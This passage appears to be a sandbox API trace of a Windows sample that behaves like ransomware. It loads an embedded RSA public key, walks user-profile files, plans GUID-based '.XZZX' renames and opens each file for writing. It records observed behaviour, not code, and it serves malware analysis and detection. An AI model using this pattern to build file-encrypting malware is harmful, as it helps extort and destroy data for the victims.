f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0201.590] lstrcpyW (in: lpString1=0x2caf460, lpString2="NTUSER.DAT.LOG2" | out: lpString1="NTUSER.DAT.LOG2") returned="NTUSER.DAT.LOG2" [0201.590] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0201.590] SetErrorMode (uMode=0x1) returned 0x1 [0201.590] lstrcpyW (in: lpString1=0x2caf860, lpString2="NTUSER.DAT.LOG2" | out: lpString1="NTUSER.DAT.LOG2") returned="NTUSER.DAT.LOG2" [0201.590] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x1de494ed, Data2=0xa64b, Data3=0x484d, Data4=([0]=0xbc, [1]=0xea, [2]=0xc2, [3]=0xbe, [4]=0x86, [5]=0xae, [6]=0xc0, [7]=0x81))) returned 0x0 [0201.590] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2") returned 36 [0201.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0201.590] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\FA894F6F2EF71C8F1DE494ED31C200D7.XZZX") returned 58 [0201.590] StrStrW (lpFirst="NTUSER.DAT.LOG2", lpSrch="XZZX") returned 0x0 [0201.591] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2", dwFileAttributes=0x20) returned 0 [0201.591] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 784 os_tid = 0xedc [0201.746] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0201.746] lstrcpyW (in: lpString1=0x2caf460, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0201.746] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0201.746] SetErrorMode (uMode=0x1) returned 0x1 [0201.746] lstrcpyW (in: lpString1=0x2caf860, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0201.746] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x28f8c04f, Data2=0xb6ce, Data3=0x4b65, Data4=([0]=0xaa, [1]=0xdb, [2]=0x3e, [3]=0x90, [4]=0xb5, [5]=0x53, [6]=0xe2, [7]=0x68))) returned 0x0 [0201.746] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 76 [0201.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0201.746] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\D0E2E99235D6794628F8C04F38A15D8E.XZZX") returned 58 [0201.746] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="XZZX") returned 0x0 [0201.747] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", dwFileAttributes=0x20) returned 0 [0201.747] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 785 os_tid = 0xee0 [0201.902] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0201.902] lstrcpyW (in: lpString1=0x2caf460, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0201.902] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0201.902] SetErrorMode (uMode=0x1) returned 0x1 [0201.902] lstrcpyW (in: lpString1=0x2caf860, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0201.902] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x247079e4, Data2=0x7c41, Data3=0x4724, Data4=([0]=0x81, [1]=0x2, [2]=0x63, [3]=0x48, [4]=0x20, [5]=0xb0, [6]=0x8e, [7]=0x4b))) returned 0x0 [0201.902] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 113 [0201.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0201.902] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\BB9962E422878024247079E42552646C.XZZX") returned 58 [0201.902] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="XZZX") returned 0x0 [0201.902] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", dwFileAttributes=0x20) returned 0 [0201.903] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 786 os_tid = 0xee4 [0202.058] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0202.058] lstrcpyW (in: lpString1=0x2caf460, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0202.058] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0202.058] SetErrorMode (uMode=0x1) returned 0x1 [0202.058] lstrcpyW (in: lpString1=0x2caf860, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0202.058] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xe29bf077, Data2=0x6486, Data3=0x4436, Data4=([0]=0x9e, [1]=0x86, [2]=0xdf, [3]=0x3c, [4]=0xc8, [5]=0xf7, [6]=0xf0, [7]=0x9))) returned 0x0 [0202.058] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 113 [0202.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0202.058] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\878E5A4A1AC8CC44E29BF0771D93B08C.XZZX") returned 58 [0202.058] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="XZZX") returned 0x0 [0202.058] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", dwFileAttributes=0x20) returned 0 [0202.059] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 787 os_tid = 0xee8 [0202.214] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0202.214] lstrcpyW (in: lpString1=0x2caf460, lpString2="ntuser.ini" | out: lpString1="ntuser.ini") returned="ntuser.ini" [0202.214] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0202.214] SetErrorMode (uMode=0x1) returned 0x1 [0202.214] lstrcpyW (in: lpString1=0x2caf860, lpString2="ntuser.ini" | out: lpString1="ntuser.ini") returned="ntuser.ini" [0202.214] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xd354714a, Data2=0xd78f, Data3=0x4cb0, Data4=([0]=0xbd, [1]=0x5c, [2]=0x21, [3]=0xa0, [4]=0x58, [5]=0xe5, [6]=0x41, [7]=0x15))) returned 0x0 [0202.214] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\ntuser.ini") returned 31 [0202.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0202.214] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\F7506E564092A650D354714A435D8A98.XZZX") returned 58 [0202.215] StrStrW (lpFirst="ntuser.ini", lpSrch="XZZX") returned 0x0 [0202.215] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\ntuser.ini", dwFileAttributes=0x20) returned 0 [0202.215] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\ntuser.ini" (normalized: "c:\\users\\default\\ntuser.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 788 os_tid = 0xeec [0202.378] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0202.378] lstrcpyW (in: lpString1=0x2caf460, lpString2="Administrator.contact" | out: lpString1="Administrator.contact") returned="Administrator.contact" [0202.378] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\") returned="\\\\?\\C:\\Users\\Default\\Contacts\\" [0202.378] SetErrorMode (uMode=0x1) returned 0x1 [0202.378] lstrcpyW (in: lpString1=0x2caf860, lpString2="Administrator.contact" | out: lpString1="Administrator.contact") returned="Administrator.contact" [0202.378] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xeac1086e, Data2=0xb7ed, Data3=0x48e2, Data4=([0]=0x88, [1]=0xdf, [2]=0x85, [3]=0x2a, [4]=0x4c, [5]=0xa7, [6]=0x15, [7]=0x89))) returned 0x0 [0202.378] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact") returned 51 [0202.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0202.378] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Contacts\\51BB6FD6345D073AEAC1086E3727EB82.XZZX") returned 67 [0202.379] StrStrW (lpFirst="Administrator.contact", lpSrch="XZZX") returned 0x0 [0202.379] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact", dwFileAttributes=0x20) returned 0 [0202.379] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 789 os_tid = 0xef0 [0202.526] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0202.526] lstrcpyW (in: lpString1=0x2caf460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0202.526] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\") returned="\\\\?\\C:\\Users\\Default\\Contacts\\" [0202.526] SetErrorMode (uMode=0x1) returned 0x1 [0202.526] lstrcpyW (in: lpString1=0x2caf860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0202.526] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x9b2e1c56, Data2=0x9490, Data3=0x40fe, Data4=([0]=0xbd, [1]=0xb8, [2]=0x6e, [3]=0xbb, [4]=0x19, [5]=0x3c, [6]=0xa3, [7]=0x84))) returned 0x0 [0202.526] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini") returned 41 [0202.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0202.526] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Contacts\\F251A86025B766E09B2E1C5628824B28.XZZX") returned 67 [0202.526] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0202.526] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini", dwFileAttributes=0x20) returned 0 [0202.526] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini" (normalized: "c:\\users\\default\\contacts\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 790 os_tid = 0xef4 [0202.691] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0202.691] lstrcpyW (in: lpString1=0x2caf460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0202.691] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Desktop\\") returned="\\\\?\\C:\\Users\\Default\\Desktop\\" [0202.691] SetErrorMode (uMode=0x1) returned 0x1 [0202.692] lstrcpyW (in: lpString1=0x2caf860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0202.692] CoCreateGuid (in: 